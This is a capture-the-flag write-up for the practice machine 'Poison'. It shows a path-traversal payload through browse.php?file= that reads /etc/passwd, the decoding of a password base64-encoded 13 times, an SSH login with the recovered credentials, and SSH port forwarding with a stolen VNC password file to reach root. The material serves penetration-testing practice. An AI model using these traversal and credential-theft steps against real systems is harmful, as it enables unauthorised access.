# Poison
> # 10.10.10.84

nmap
>PORT   STATE SERVICE VERSION
[22/tcp](portscan.md#22) open  ssh     OpenSSH 7.2 (FreeBSD 20161230; protocol 2.0)
[80/tcp](portscan.md#80) open  http    Apache httpd 2.4.29 ((FreeBSD) PHP/5.6.32)


The webpage give us the possibility to test some script and they give us a list of .php script to try out.
![[poison1.png]]
running info.php we get sent to this link:
http://10.10.10.84/browse.php?file=info.php
```txt
FreeBSD Poison 11.1-RELEASE FreeBSD 11.1-RELEASE #0 r321309: Fri Jul 21 02:08:28 UTC 2017 root@releng2.nyi.freebsd.org:/usr/obj/usr/src/sys/GENERIC amd64
```
And as you can see the URL ends with 
```
file=info.php
```
They recall the file to run/display via URL, could be a [LFI](LFI.md).
Let's note that and move to the other suggested file.

Running the "listfiles.php" file will return this: 
```txt
Array ( [0] => . [1] => .. [2] => browse.php [3] => index.php [4] => info.php [5] => ini.php [6] => listfiles.php [7] => phpinfo.php [8] => pwdbackup.txt )
```
The last entry is a .txt called pwdbackup.txt, a password backup it's always worth at least a quick review, let's go tho his link:
http://10.10.10.84/pwdbackup.txt

![[poison2.png]]
```txt
This password is secure, it's encoded atleast 13 times.. what could go wrong really..

Vm0wd2QyUXlVWGxWV0d4WFlURndVRlpzWkZOalJsWjBUVlpPV0ZKc2JETlhhMk0xVmpKS1IySkVU
bGhoTVVwVVZtcEdZV015U2tWVQpiR2hvVFZWd1ZWWnRjRWRUTWxKSVZtdGtXQXBpUm5CUFdWZDBS
bVZHV25SalJYUlVUVlUxU1ZadGRGZFZaM0JwVmxad1dWWnRNVFJqCk1EQjRXa1prWVZKR1NsVlVW
M040VGtaa2NtRkdaR2hWV0VKVVdXeGFTMVZHWkZoTlZGSlRDazFFUWpSV01qVlRZVEZLYzJOSVRs
WmkKV0doNlZHeGFZVk5IVWtsVWJXaFdWMFZLVlZkWGVHRlRNbEY0VjI1U2ExSXdXbUZEYkZwelYy
eG9XR0V4Y0hKWFZscExVakZPZEZKcwpaR2dLWVRCWk1GWkhkR0ZaVms1R1RsWmtZVkl5YUZkV01G
WkxWbFprV0dWSFJsUk5WbkJZVmpKMGExWnRSWHBWYmtKRVlYcEdlVmxyClVsTldNREZ4Vm10NFYw
MXVUak5hVm1SSFVqRldjd3BqUjJ0TFZXMDFRMkl4WkhOYVJGSlhUV3hLUjFSc1dtdFpWa2w1WVVa
T1YwMUcKV2t4V2JGcHJWMGRXU0dSSGJFNWlSWEEyVmpKMFlXRXhXblJTV0hCV1ltczFSVmxzVm5k
WFJsbDVDbVJIT1ZkTlJFWjRWbTEwTkZkRwpXbk5qUlhoV1lXdGFVRmw2UmxkamQzQlhZa2RPVEZk
WGRHOVJiVlp6VjI1U2FsSlhVbGRVVmxwelRrWlplVTVWT1ZwV2EydzFXVlZhCmExWXdNVWNLVjJ0
NFYySkdjR2hhUlZWNFZsWkdkR1JGTldoTmJtTjNWbXBLTUdJeFVYaGlSbVJWWVRKb1YxbHJWVEZT
Vm14elZteHcKVG1KR2NEQkRiVlpJVDFaa2FWWllRa3BYVmxadlpERlpkd3BOV0VaVFlrZG9hRlZz
WkZOWFJsWnhVbXM1YW1RelFtaFZiVEZQVkVaawpXR1ZHV210TmJFWTBWakowVjFVeVNraFZiRnBW
VmpOU00xcFhlRmRYUjFaSFdrWldhVkpZUW1GV2EyUXdDazVHU2tkalJGbExWRlZTCmMxSkdjRFpO
Ukd4RVdub3dPVU5uUFQwSwo=
```

It's a encoded password, they say "at least 13 times" and due to the char in it and the place holder "=" at the end it looks like base64, maybe base64 13 times.
If you want to use some online tool such as cyberchef free to do it:
![[poison3.png]]

If you like to do it by yourself as a real man you can simply write a bash script with base64:
```bash
text=$(cat psw.enc)

for i in {1..13}
do
	text=$(base64 -d <<< $text)
done
echo $text
#output> Charix!2#4%6&8(0
```
The decoded text is the following:
Charix!2#4%6&8(0

We have a password, it's not the root password for ssh in, we have to try something else.
We can try to leak some username maybe with the LFI hypotized in first place.
http://10.10.10.84/browse.php?file=../../../../../../../../../../../../../etc/passwd
![[poison4.png]]
Boink
The number :1001: identify a regular user and it's called **charix**.
Now we have a username and a password:
>charix:Charix!2#4%6&8(0

![[poison5.png]]
This is enough for the user flag.

---
Let's check our landing folder:
![[poison6.png]]
There's a zip file password protected, download if with sftp - ftp via ssh - 
```bash
sftp charix@10.10.10.84
```
The first guess is obviously the user password and it's the right one.
It's a couple byte of file called secret, non ascii and not utf-8.
Looks like rabbit hole, moving on maybe check again later, not wasting time.
Linpeas is not working, sudo is not present, let's check if some weird service is running, let's see if there's some open port that we weren't allowed to see from the outside:
```bash
sockstat -4 -l | grep "root"
```
![[poison7.png]]
Nothing weird except for that port 5901 and 5801 running this "Xvnc" available to the localhost only.

Basically Xvnc is an upgraded version of [VNC](https://www.realvnc.com/en/) which is for what we need to know is a remote connection software.

Now that we know that this could be something interesting we can try [portforwarding](portforwarding.md) the 5901 to us and try to connect via VNC (probably you'll have to install it).
```bash
#port forward: 
ssh -L 5901:127.0.0.1:5901 charix@10.10.10.84
```
Now we have to connect to the service:
```bash
vncviewer 127.0.0.1:5901
```
**BUT** this won't work, we don't have the root password.
After some enumeration on the machine without any result the only thing remaining is that "secret" file found in the user folder, let's try it out:
```bash
vncviewer -passwd secret 127.0.0.1:5901
```
![[poison8.png]]
Here we go, we're root

#machine #LFI #vnc #portforwarding